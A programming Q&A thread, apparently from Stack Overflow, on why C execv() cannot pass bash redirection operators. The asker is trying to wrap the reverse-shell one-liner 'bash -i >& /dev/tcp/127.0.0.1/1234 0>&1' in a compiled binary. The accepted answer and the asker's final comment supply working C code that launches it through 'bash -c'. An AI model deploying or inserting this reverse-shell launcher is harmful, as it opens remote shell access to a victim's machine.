# bash -i >& /dev/tcp/127.0.0.1/1234 0>&1

Tags: c, linux, bash, gcc, shellcode

I know that some part of the above title has already been asked but I still have some confusions. Actually, I don't really get the ">&" in *bash -i >& /dev/tcp/127.0.0.1/1234 0>&1*
My main goal is to compile the following code:

```
 *#include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 int main(){
 char *prog = "/bin/bash";
 /*bash -i >& /dev/tcp/127.0.0.1/1234 0>&1*/
 char *args[5] = {"/bin/bash", "-i",  ">&", "/dev/tcp/127.0.0.1  /1234","0>&1"};

execv(prog, args);
return 0;
}
```

it get compiled but when I execute the corresponding binary file, it gives me back the following error:
    *bash: >&: No such file or directory*

Any explanation would be really highly appreciated ;)!

Comment: Have you already verified that the code works on the normal cli?

Comment: Yes. Already checked and it worked like a charm :)

Comment: `0>&1` is a shell syntax to direct file descriptor 0 of the process (aka stdin) to file descriptor 1 (aka stdout). That redirection is performed by the shell, so you can't do it in `exec*`

Comment: But the error is about the first redirection not the last one ! I mean even if i remove the last redirection 0>&1  the error remains

Comment: Possible duplicate of [Receiving error code during output redirection using execvp](http://stackoverflow.com/questions/30612855/receiving-error-code-during-output-redirection-using-execvp)

Comment: In short, redirection operators are not options that can be passed to a program, which is what you're trying to do.

Answer (score 4, accepted):

When you run:

```
bash -i >& /dev/tcp/127.0.0.1/1234 0>&1
```

on a command prompt, your current shell (the one that displays the prompt and waits for commands) interprets the redirections.

When you run an external program using one of the [`exec*()`](http://linux.die.net/man/3/execv) functions there is no shell out there to parse the command line and interpret the redirections. `execv()` launches `bash` that with the rest of the command line as arguments.

The command line of [`bash`](http://linux.die.net/man/1/bash) is:

```
bash options file
```

where the options start with a dash (`-`).

It probably interprets `-i` successfully then, because `>&` doesn't start with a dash (`-`) it thinks it is a file name. It cannot find such a file, it reports the error *">&: No such file or directory"* and exits.

You should use either [`system()`](http://linux.die.net/man/3/system) to launch a shell and provide it the entire command line, or [`popen()`](http://linux.die.net/man/3/popen) (it allows you to also pass some input to the new process after it starts).

Both these functions create a new process. Since your original code uses `execv()` and the `exec*()` functions replace the current running process with a new one, you should probably `exit()` after you launch the new process to get your current behaviour.

---

It is possible (I didn't test) that also launching the following command using `execv()` will produce the result you expect:

```
bash -c "bash -i >& /dev/tcp/127.0.0.1/1234 0>&1"
```

In C:

```
char *prog = "/bin/bash";
char *args[] = {"/bin/bash", "-c", "/bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1"};
execv(prog, args);
```

Comment: Dear @axiac, that explained it and solved my concerns! Really appreciated. So the final code is   <code> #include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(){
char *prog = "/bin/bash";
char *args[3] = {"/bin/bash", "-c", "/bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&
1"};
execv(prog, args);
return 0;
}</code>